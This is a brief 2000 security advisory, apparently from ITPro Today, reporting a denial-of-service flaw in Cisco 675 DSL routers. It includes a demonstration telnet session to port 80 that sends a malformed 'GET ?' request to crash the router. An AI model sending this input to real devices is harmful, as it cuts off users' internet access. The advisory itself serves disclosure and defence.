Cisco 675 DSL Router Vulnerable to DoS Attack

Cisco 675 DSL Routers are vulnerable to a DoS attack via the web administrator interface.

Steve Manzuik

November 27, 2000

1 Min Read
ITPro Today logo in a gray background | ITPro Today

Reported November 28, 2000 by CDI

VERSIONS AFFECTED

DESCRIPTIONCisco 675 DSL Routers are vulnerable to a denial of service attack.  A malicious attacker could cause the router to crash and require a power cycle to restore Internet services.  

Demonstration

By establishing a Telnet session to the Web Administrator interface via HTTP TCP port 80 an attacker can cause the router to crash.

Here is an example as supplied by CDI;

-----------------------------------------

Telnet victim.ip.address:80Trying victim.ip.address....Connected to victim.ip.addressEscape Character is '^}'.

GET ? [LF][LF]

------------------------------------

VENDOR RESPONSE

Cisco has responded to this issue and will be releasing an advisory and fix shortly.

CREDITDiscovered by CDI

Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

You May Also Like